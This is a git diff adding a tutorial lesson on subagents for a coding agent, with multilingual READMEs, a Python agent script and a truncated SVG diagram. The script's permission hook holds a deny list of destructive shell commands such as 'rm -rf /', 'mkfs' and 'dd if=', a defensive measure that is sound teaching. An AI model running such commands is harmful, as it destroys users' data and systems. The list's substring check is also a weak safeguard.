+cd learn-claude-code +python s06_subagent/code.py +``` + +Try these prompts: + +1. `Use a subtask to find what testing framework this project uses` (sub-Agent reads files, main Agent receives only the conclusion) +2. `Delegate: read all .py files in agents/ and summarize what each one does` +3. `Use a task to create a new module, then verify it from here` + +What to watch for: Does the Agent spawn a sub-Agent to read files? Do the sub-Agent's intermediate steps appear in the main conversation? Does the final conclusion include the file contents that the sub-Agent read? + +--- + +## What's Next + +The Agent can now break tasks apart. But different tasks require different knowledge — editing frontend components needs React conventions, writing SQL needs table schemas. Stuffing all this knowledge into the system prompt would blow up the context. + +→ s07 Skill Loading: Inject skills on demand instead of piling documents into the system prompt. Load only when needed, as natural as reading a file. + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `AgentTool.tsx`, `runAgent.ts`, `forkSubagent.ts`, and `forkedAgent.ts`. + +### 1. Not One Pattern, but Three + +The teaching version covers only "fresh messages[]". CC actually has three execution modes: + +| Mode | Trigger | Context | +|------|---------|---------| +| **Normal Subagent** | `subagent_type` specified | **Truly fresh messages[]** — only the prompt | +| **Fork Subagent** | No `subagent_type`, fork gate enabled | **Inherits parent Agent's full messages** — shares prompt cache | +| **General-Purpose** | No `subagent_type`, fork gate disabled | Same as Normal | + +### 2. Fork Mode: Sharing Prompt Cache + +This is a core concept the teaching version omits. Fork mode (`forkSubagent.ts:60-71`) doesn't create a fresh context — it **inherits the parent Agent's message history**. The goal isn't isolation, but **making the Anthropic API's prompt cache hit** — parent and child Agent's system prompt, tools, and message prefix are byte-identical, so the API doesn't need to recompute. + +Five key components for cache hit (`forkedAgent.ts:57-68`): system prompt, tools, model, message prefix, thinking config — must be byte-identical. + +### 3. Context Isolation's Precise Granularity + +`createSubagentContext()` (`forkedAgent.ts:345-462`) creates the sub-Agent's `ToolUseContext`: + +| Field | Behavior | +|-------|----------| +| `abortController` | New child controller; parent abort propagates down | +| `setAppState` | **no-op** (sub-Agent can't modify parent UI) | +| `readFileState` | **Cloned from parent** (avoids re-reading same files) | +| `queryTracking` | New chainId, `depth = parentDepth + 1` | + +The sub-Agent isn't fully isolated — file read state is shared, but UI and notifications are completely blocked. + +### 4. Recursive Fork Protection + +CC explicitly prevents sub-Agents from spawning grandchild Agents — `isInForkChild()` (`forkSubagent.ts:78-89`) checks the conversation history for `FORK_BOILERPLATE_TAG` and refuses if found. + +### 5. Permission Bubbling + +Fork Agent's `permissionMode: 'bubble'` (`forkSubagent.ts:67`) means the sub-Agent's permission prompts **bubble up to the parent terminal** — the user approves sub-Agent operations in the main terminal. + +### 6. Async vs Sync + +The teaching version only shows synchronous sub-Agents (parent waits for child to finish). CC also supports async paths (`AgentTool.tsx:686-764`): when `run_in_background: true`, the sub-Agent launches asynchronously, returning `{ status: 'async_launched' }` immediately to the parent, and notifies the parent when complete. + +### Teaching Version Simplifications Are Intentional + +- Three modes → one (fresh messages): conceptually clear +- Prompt cache sharing → omitted: teaching version doesn't involve API-layer optimization +- Recursive fork protection → simplified to "sub-Agent has no task tool" +- Async → omitted (left for s13): s06 focuses on the synchronous model first + +
+ + diff --git a/s06_subagent/README.ja.md b/s06_subagent/README.ja.md new file mode 100644 index 000000000..84ed5f1c8 --- /dev/null +++ b/s06_subagent/README.ja.md @@ -0,0 +1,188 @@ +# s06: Subagent — 大きなタスクを分割、それぞれがクリーンなコンテキストを取得 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → `s06` → [s07](../s07_skill_loading/) → s08 → ... → s19 + +> *"大きなタスクは小さく、小さなタスクごとにクリーンなコンテキスト"* — Subagent は独立した messages[] を使い、メイン会話を汚染しない。 +> +> **Harness レイヤー**: サブエージェント — コンテキストの隔離、注意の散漫を防ぐ。 + +--- + +## 課題 + +Agent がバグを修正している。呼び出しチェーンを追跡するために 30 のファイルを読み、途中で 60 ラウンドやり取りした。messages リストは 120 件に膨らみ、その大部分は「呼び出しチェーンの追跡」という中間過程 — 「バグ修正」という最終目標とは無関係。 + +この中間過程がコンテキストの席を占め、Agent はますます「健忘」になる — 最初の問題が何だったか覚えていられない。 + +別の見方をすると:バグを修正するとき、あなたは「新しいターミナルを開いて」呼び出しチェーンを追跡するだろう。追跡が終わったらターミナルを閉じ、結果をメモに書き、元のターミナルに戻ってバグ修正を続ける。Agent にもこの能力が必要 — **独立したサブプロセスを開き、独立したメッセージリストを与え、一つのことに集中させる。** + +--- + +## ソリューション + +![Subagent Overview](images/subagent-overview.ja.svg) + +s05 のループ、フック、TODO システムは完全に保持される。唯一の変更は TOOL_HANDLERS にもう一つツールを登録すること:`task`。呼び出されると、サブエージェントを spawn する — 新しい `messages[]` を持ち、自分自身のループを実行し、終了後に要約テキストのみをメイン Agent に返す。中間過程はすべて破棄される。 + +サブエージェントのツールは制限される:bash/read/write/edit/glob を持つが、**task はない** — 孫エージェントの再帰的 spawn を禁止。 + +--- + +## 仕組み + +**spawn_subagent** — サブエージェントに新しいメッセージリストを与え、自分自身のループを実行し、結論のみを返す: + +```python +def spawn_subagent(description: str) -> str: + # サブエージェントのツール:基本ツールのみ、task なし(再帰禁止) + sub_tools = [ + {"name": "bash", ...}, {"name": "read_file", ...}, + {"name": "write_file", ...}, {"name": "edit_file", ...}, + {"name": "glob", ...}, + ] + messages = [{"role": "user", "content": description}] # 新規 messages[] + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=sub_tools, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + # 最後のテキスト結論のみを返す — 中間過程はすべて破棄 + return extract_text(messages[-1]["content"]) +``` + +メイン Agent の呼び出しは、他のツールと同じ: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + {"name": "todo_write", ...}, + # s06: 新規 task ツール + {"name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, +] + +TOOL_HANDLERS["task"] = spawn_subagent +``` + +三つの重要な設計決定: + +| 決定 | 選択 | 理由 | +|------|------|------| +| コンテキスト隔離 | 新規 `messages[]` | サブエージェントの中間過程がメイン Agent のコンテキストを汚染しない | +| 結論のみ返却 | `extract_text(last_message)` | messages リスト全体を返すのではない | +| 再帰禁止 | サブエージェントに task ツールなし | サブエージェントが孫エージェントを spawn するのを防止 | + +ループは一行も変わらない。task ツールは `TOOL_HANDLERS[block.name]` を通じて自動的にディスパッチされる。 + +--- + +## s05 からの変更 + +| コンポーネント | 変更前 (s05) | 変更後 (s06) | +|--------------|-------------|-------------| +| ツール数 | 6 (bash, read, write, edit, glob, todo_write) | 7 (+task) | +| 新規関数 | — | spawn_subagent(独立 messages[] + 30 ラウンド安全制限) | +| コンテキスト隔離 | すべてメイン会話内 | サブエージェントが新規 messages[] を使用 | +| ループ | 不変 | 不変(task ツールは自動ディスパッチ) | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s06_subagent/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Use a subtask to find what testing framework this project uses`(サブエージェントがファイルを読み、メイン Agent は結論のみ受け取る) +2. `Delegate: read all .py files in agents/ and summarize what each one does` +3. `Use a task to create a new module, then verify it from here` + +観察のポイント:Agent はサブエージェントを spawn してファイルを読みに行くか? サブエージェントの中間過程はメイン会話に現れるか? 最後に返された結論に、サブエージェントが読んだファイルの内容は含まれているか? + +--- + +## 次へ + +Agent はタスクを分割できるようになった。しかし各タスクに必要な知識は異なる — フロントエンドコンポーネントの変更には React 規約が必要で、SQL を書くにはテーブル構造を知る必要がある。これらの知識をすべて system prompt に詰め込むと、コンテキストが溢れてしまう。 + +→ s07 Skill Loading:スキルをオンデマンドで注入する。system prompt にドキュメントを積み上げるのではなく、必要なときだけ読み込む。ファイルを読むのと同じくらい自然に。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `AgentTool.tsx`、`runAgent.ts`、`forkSubagent.ts`、`forkedAgent.ts` の完全分析に基づく。 + +### 一、一つのパターンではなく三つ + +教育版は「新規 messages[]」のみを取り上げる。CC には実際に三つの実行モードがある: + +| モード | トリガー | コンテキスト | +|--------|---------|-------------| +| **Normal Subagent** | `subagent_type` 指定時 | **真の新規 messages[]** — プロンプトのみ | +| **Fork Subagent** | `subagent_type` 未指定、fork gate 有効時 | **親 Agent の全 messages を継承** — プロンプトキャッシュを共有 | +| **General-Purpose** | `subagent_type` 未指定、fork gate 無効時 | Normal と同じ | + +### 二、Fork モード:プロンプトキャッシュの共有のため + +これは教育版にはない核心概念。Fork モード(`forkSubagent.ts:60-71`)は新規コンテキストを作成せず、**親 Agent のメッセージ履歴を継承する**。目的は隔離ではなく、**Anthropic API のプロンプトキャッシュをヒットさせること** — 親子 Agent の system prompt、tools、messages プレフィックスがバイトレベルで一致するため、API 側で再計算が不要になる。 + +キャッシュヒットの五つの重要コンポーネント(`forkedAgent.ts:57-68`):system prompt、tools、model、messages プレフィックス、thinking config — バイトレベルで一致する必要がある。 + +### 三、コンテキスト隔離の精密な粒度 + +`createSubagentContext()`(`forkedAgent.ts:345-462`)はサブエージェントの `ToolUseContext` を作成: + +| フィールド | 挙動 | +|-----------|------| +| `abortController` | 新しい子コントローラ、親の abort は下に伝播 | +| `setAppState` | **no-op**(サブエージェントは親 UI を変更不可) | +| `readFileState` | **親からクローン**(同じファイルの再読み込みを回避) | +| `queryTracking` | 新しい chainId、`depth = parentDepth + 1` | + +サブエージェントは完全に隔離されているわけではない — ファイル読み取り状態は共有されるが、UI と通知は完全に遮断される。 + +### 四、再帰 Fork 防護 + +CC はサブエージェントが孫エージェントを spawn するのを明示的に防止 — `isInForkChild()`(`forkSubagent.ts:78-89`)が会話履歴内に `FORK_BOILERPLATE_TAG` があるかチェックし、あれば拒否する。 + +### 五、Permission Bubbling + +Fork Agent の `permissionMode: 'bubble'`(`forkSubagent.ts:67`)は、サブエージェントの権限プロンプトが**親ターミナルにバブルアップ**することを意味する — ユーザーはメインターミナルでサブエージェントの操作を承認する。 + +### 六、Async vs Sync + +教育版は同期サブエージェントのみ(親が子の完了を待つ)を示す。CC は非同期パスもサポート(`AgentTool.tsx:686-764`):`run_in_background: true` の場合、サブエージェントは非同期で起動し、`{ status: 'async_launched' }` を直ちに親に返し、完了時に通知機構で親に知らせる。 + +### 教育版の簡略化は意図的 + +- 三つのモード → 一つ(新規 messages):概念的に明確 +- プロンプトキャッシュ共有 → 省略:教育版は API 層の最適化を扱わない +- 再帰 fork 防護 → 「サブエージェントに task ツールなし」に簡略化 +- Async → 省略(s13 に委ねる):s06 はまず同期モデルを理解する + +
+ + diff --git a/s06_subagent/README.md b/s06_subagent/README.md new file mode 100644 index 000000000..2eb89eb3b --- /dev/null +++ b/s06_subagent/README.md @@ -0,0 +1,188 @@ +# s06: Subagent — 大任务拆小,每个拿到的都是干净上下文 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → `s06` → [s07](../s07_skill_loading/) → s08 → ... → s19 + +> *"大任务拆小, 每个小任务干净的上下文"* — Subagent 用独立 messages[], 不污染主对话。 +> +> **Harness 层**: 子 Agent — 上下文隔离, 注意力不漂移。 + +--- + +## 问题 + +Agent 在修一个 bug。它读了 30 个文件来追踪调用链,中间聊了 60 轮。messages 列表涨到 120 条,其中大部分是"追踪调用链"的中间过程——和"修 bug"这个最终目标无关。 + +这些中间过程占着上下文位置,让 Agent 越来越"健忘"——它记不住最初的问题是什么了。 + +换个角度:你修 bug 的时候,会"开一个新终端"来追踪调用链。追踪完了,终端关掉,结果写进笔记,回到原来的终端继续修 bug。Agent 也需要这个能力——**开一个独立的子进程,给它一个独立的消息列表,让它专心做一件事。** + +--- + +## 解决方案 + +![Subagent Overview](images/subagent-overview.svg) + +s05 的循环、钩子、TODO 系统完全保留。唯一的变化是在 TOOL_HANDLERS 里多注册一个 `task` 工具。调用它时,spawn 一个子 Agent——拥有全新的 `messages[]`,跑自己的循环,结束后只把摘要文本回传给主 Agent。中间过程全部丢弃。 + +子 Agent 的工具受限:有 bash/read/write/edit/glob,但**没有 task**——禁止递归 spawn 孙 Agent。 + +--- + +## 工作原理 + +**spawn_subagent**——给子 Agent 一个全新的 messages 列表,跑自己的循环,只回传结论: + +```python +def spawn_subagent(description: str) -> str: + # 子 Agent 的工具:基础工具,但没有 task(禁止递归) + sub_tools = [ + {"name": "bash", ...}, {"name": "read_file", ...}, + {"name": "write_file", ...}, {"name": "edit_file", ...}, + {"name": "glob", ...}, + ] + messages = [{"role": "user", "content": description}] # 全新 messages[] + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=sub_tools, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + # 只返回最后的文本结论——中间过程全部丢弃 + return extract_text(messages[-1]["content"]) +``` + +主 Agent 调用时,跟调其他工具一样: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + {"name": "todo_write", ...}, + # s06: 新增 task 工具 + {"name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, +] + +TOOL_HANDLERS["task"] = spawn_subagent +``` + +三个关键设计决策: + +| 决策 | 选择 | 原因 | +|------|------|------| +| 上下文隔离 | 全新 `messages[]` | 子 Agent 的中间过程不污染主 Agent 的上下文 | +| 只回传结论 | `extract_text(last_message)` | 不是回传整个 messages 列表 | +| 禁止递归 | 子 Agent 无 task 工具 | 防止子 Agent 再 spawn 孙 Agent | + +循环一行不改。task 工具自动通过 `TOOL_HANDLERS[block.name]` 分发。 + +--- + +## 相对 s05 的变更 + +| 组件 | 之前 (s05) | 之后 (s06) | +|------|-----------|-----------| +| 工具数量 | 6 (bash, read, write, edit, glob, todo_write) | 7 (+task) | +| 新函数 | — | spawn_subagent(独立 messages[] + 30 轮安全限制) | +| 上下文隔离 | 全部在主对话中 | 子 Agent 用全新的 messages[] | +| 循环 | 不变 | 不变(task 工具自动分发) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s06_subagent/code.py +``` + +试试这些 prompt: + +1. `Use a subtask to find what testing framework this project uses`(子 Agent 去读文件,主 Agent 只收结论) +2. `Delegate: read all .py files in agents/ and summarize what each one does` +3. `Use a task to create a new module, then verify it from here` + +观察重点:Agent 会 spawn 子 Agent 去读文件吗?子 Agent 的中间过程是否出现在主对话中?最后返回的结论包含子 Agent 读的那些文件内容吗? + +--- + +## 接下来 + +Agent 现在能拆任务了。但每个任务需要的知识不一样——改前端组件需要知道 React 规范,写 SQL 需要知道表结构。这些知识全塞进 system prompt,上下文直接爆了。 + +s07 Skill Loading → 技能按需注入,不在 system prompt 里堆文档。用到的时候才加载,和读文件一样自然。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `AgentTool.tsx`、`runAgent.ts`、`forkSubagent.ts`、`forkedAgent.ts` 的完整分析。 + +### 一、不是一种模式,是三种 + +教学版只讲了"全新的 messages[]"。CC 实际有三种执行模式: + +| 模式 | 触发条件 | 上下文 | +|------|---------|--------| +| **Normal Subagent** | 指定了 `subagent_type` | **真正的全新 messages[]**——只有 prompt | +| **Fork Subagent** | 没指定 `subagent_type`,fork gate 开启 | **继承父 Agent 的全部 messages**——共享 prompt cache | +| **General-Purpose** | 没指定 `subagent_type`,fork gate 关闭 | 同 Normal | + +### 二、Fork 模式:为了共享 Prompt Cache + +这是教学版没有的核心概念。Fork 模式(`forkSubagent.ts:60-71`)不创建全新上下文,而是**继承父 Agent 的消息历史**。目的不是隔离,而是**让 Anthropic API 的 prompt cache 命中**——父子 Agent 的 system prompt、tools、messages 前缀完全一致,API 端不需要重算。 + +缓存命中的五个关键组件(`forkedAgent.ts:57-68`):system prompt、tools、model、messages 前缀、thinking config——必须字节级一致。 + +### 三、Context Isolation 的精确粒度 + +`createSubagentContext()`(`forkedAgent.ts:345-462`)创建子 Agent 的 `ToolUseContext`: + +| 字段 | 行为 | +|------|------| +| `abortController` | 新的 child controller,父 abort 向下传播 | +| `setAppState` | **no-op**(子 Agent 不能改父 UI) | +| `readFileState` | **从父克隆**(避免重复读相同文件) | +| `queryTracking` | 新 chainId,`depth = parentDepth + 1` | + +子 Agent 不是完全隔离的——文件读取状态是共享的,但 UI 和通知是完全阻断的。 + +### 四、递归 Fork 防护 + +CC 明确防止子 Agent 再 spawn 孙 Agent——`isInForkChild()`(`forkSubagent.ts:78-89`)检查对话历史中是否有 `FORK_BOILERPLATE_TAG`,有就拒绝。 + +### 五、Permission Bubbling + +Fork Agent 的 `permissionMode: 'bubble'`(`forkSubagent.ts:67`)意味着子 Agent 的权限弹窗**冒泡到父终端**——用户在主终端里审批子 Agent 的操作。 + +### 六、Async vs Sync + +教学版只展示了同步子 Agent(父等着子跑完)。CC 还支持异步路径(`AgentTool.tsx:686-764`):`run_in_background: true` 时异步启动,返回 `{ status: 'async_launched' }` 立即给父 Agent,子 Agent 完成后通过通知机制告知父 Agent。 + +### 教学版的简化是刻意的 + +- 三种模式 → 一种(fresh messages):概念清晰 +- Prompt cache 共享 → 省略:教学版不涉及 API 层优化 +- 递归 fork 防护 → 简化为"子 Agent 无 task 工具" +- Async → 省略(留给 s13):s06 先理解同步模型 + +
+ + diff --git a/s06_subagent/code.py b/s06_subagent/code.py new file mode 100644 index 000000000..f7cff5c6e --- /dev/null +++ b/s06_subagent/code.py @@ -0,0 +1,336 @@ +#!/usr/bin/env python3 +""" +s06: Subagent — spawn sub-agents with fresh messages[] for context isolation. + + Parent Agent Subagent + +------------------+ +------------------+ + | messages=[...] | | messages=[task] | <-- fresh + | | dispatch | | + | tool: task | ---------------> | own while loop | + | prompt="..." | | bash/read/... | + | | summary only | (max 30 turns) | + | result = "..." | <--------------- | return last text | + +------------------+ +------------------+ + ^ | + | intermediate results DISCARDED | + +--------------------------------------+ + + Subagent tools: bash, read, write, edit, glob (NO task — no recursion) + +Changes from s05: + + task tool + spawn_subagent() with fresh messages[] + + Safety limit: max 30 turns per subagent + + extract_text() helper + Subagent cannot spawn sub-subagents (no task tool in sub_tools). + Main loop unchanged: task auto-dispatches via TOOL_HANDLERS. + +Run: python s06_subagent/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +TASKS_DIR = WORKDIR / ".tasks"; TASKS_DIR.mkdir(exist_ok=True) +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "For complex sub-problems, use the task tool to spawn a subagent." +) + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s05 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + lines = ["\n\033[33m## Current Tasks\033[0m"] + for t in todos: + icon = {"pending": " ", "in_progress": "\033[36m▸\033[0m", "completed": "\033[32m✓\033[0m"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" + +def extract_text(content) -> str: + """Extract text from message content blocks.""" + if not isinstance(content, list): + return str(content) + return "\n".join(getattr(b, "text", "") for b in content if getattr(b, "type", None) == "text") + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, + {"name": "todo_write", "description": "Create and manage a task list for your current coding session.", + "input_schema": {"type": "object", "properties": {"todos": {"type": "array", "items": {"type": "object", "properties": {"content": {"type": "string"}, "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}}}}}}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, "todo_write": run_todo_write, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s06: Subagent — fresh messages[], summary only +# ═══════════════════════════════════════════════════════════ + +SUB_TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] +# NO "task" tool — prevent recursive spawning + +SUB_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + +def spawn_subagent(description: str) -> str: + """Spawn a subagent with fresh messages[], return summary only.""" + print(f"\n\033[35m[Subagent spawned]\033[0m") + messages = [{"role": "user", "content": description}] # fresh context + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=SUB_TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(f" \033[90m[sub] {block.name}: {str(output)[:100]}\033[0m") + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + result = extract_text(messages[-1]["content"]) + print(f"\033[35m[Subagent done]\033[0m") + return result # only summary, entire message history discarded + +# Add task tool to parent's tools +TOOLS.append({ + "name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}, +}) +TOOL_HANDLERS["task"] = spawn_subagent + + +# ═══════════════════════════════════════════════════════════ +# FROM s04 (unchanged): Hook System +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: + return result + return None + +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] + +def permission_hook(block): + """PreToolUse: deny list check.""" + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{p}'\033[0m") + return "Permission denied" + return None + +def log_hook(block): + """PreToolUse: log tool calls.""" + print(f"\033[90m[HOOK] {block.name}\033[0m") + return None + +def context_inject_hook(query: str): + """UserPromptSubmit: log working directory.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +def summary_hook(messages: list): + """Stop: print tool call count.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s05 + nag reminder, task auto-dispatches +# ═══════════════════════════════════════════════════════════ + +rounds_since_todo = 0 + +def agent_loop(messages: list): + global rounds_since_todo + while True: + # s05: nag reminder + if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) + + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + rounds_since_todo += 1 + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + if block.name == "todo_write": + rounds_since_todo = 0 + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s06: Subagent — spawn sub-agents with fresh context, summary only") + print("Type a question, press Enter. Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms06 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s06_subagent/images/subagent-overview.en.svg b/s06_subagent/images/subagent-overview.en.svg new file mode 100644 index 000000000..de21708d8 --- /dev/null +++ b/s06_subagent/images/subagent-overview.en.svg @@ -0,0 +1,121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Subagent — Independent messages[], All Intermediate Steps Discarded + + + + Parent Agent + + + + messages[] + + + + + + + LLM + + + + tool_use + + + + TOOL_HANDLERS + + + + task → spawn + + + + Base Tools + bash / read / write / ... + + + + Normal tool results → messages[] + + + + Subagent (Fresh Context) + + + + messages = [task] + fresh — no parent history + + + + + + + LLM + + + + Own while loop (max 30 rounds) + bash · read · write · edit · glob + No task — recursive spawn forbidden + + + + Intermediate 30+ tool calls + results + All discarded ✗ + + + + ✓ Extract only final text → return to Parent + + + + + ① dispatch + + + + + ② return summary + + + + + + s05 Preserved: loop, hooks, todo_write, 6 base tools + + + s06 New: task tool + spawn_subagent() — independent messages[], returns only summary + + + + ① Parent → Sub: + task description (a short string) + ② Sub → Parent: + extract_text() (final conclusion only) + diff --git a/s06_subagent/images/subagent-overview.ja.svg b/s06_subagent/images/subagent-overview.ja.svg new file mode 100644 index 000000000..50f28d3a7 --- /dev/null +++ b/s06_subagent/images/subagent-overview.ja.svg @@ -0,0 +1,121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Subagent — 独立した messages[]、中間過程はすべて破棄 + + + + 親 Agent + + + + 